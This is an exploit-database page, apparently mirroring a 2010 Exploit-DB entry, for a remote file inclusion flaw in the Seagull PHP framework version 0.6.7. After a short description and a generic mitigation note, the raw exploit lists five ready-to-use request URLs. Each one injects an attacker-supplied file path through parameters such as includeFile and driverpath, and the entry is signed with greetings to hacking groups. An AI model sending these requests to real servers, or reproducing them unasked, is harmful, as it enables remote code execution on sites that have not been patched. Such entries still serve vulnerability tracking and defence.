header-logo
Suggest Exploit
vendor:
Seagull
by:
FoX HaCkEr
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Seagull
Affected Version From: 0.6.7
Affected Version To: 0.6.7
Patch Exists: YES
Related CWE: N/A
CPE: a:seagull_project:seagull:0.6.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

seagull-0.6.7 <===remote file inclode

Seagull is a web application framework written in PHP. A remote file inclusion vulnerability exists in Seagull version 0.6.7. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. This can allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The application should validate user input and filter out any malicious code. The application should also be configured to use the latest version of the software.
Source

Exploit-DB raw data:

=================================
seagull-0.6.7 <===remote file inclode 
=================================
# Exploit Title : seagull-0.6.7 <===remote file inclode

# Date: 2010-08-29

# Author : FoX HaCkEr

#Contact : MKQ@HoTmAiL.CoM

# SiTe : www.sec4ever.com

# Download: http://seagullproject.org/ 

# Version:6.7
  
# Google dork: [sorry]

======================================================================================================
exploit :

http://localhost/fog/lib/pear/Config/Container.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet.php?driverpath=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]
http://localhost/fog/lib/pear/DB/NestedSet/Output.php?path=[EV!L]
http://localhost/fog/lib/pear/HTML/QuickForm.php?includeFile=[EV!L]

=======================================================================================================

Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in  MsN & ALL Members Sa-HaCkE

Navigation

Suggest Exploit

Services By CQR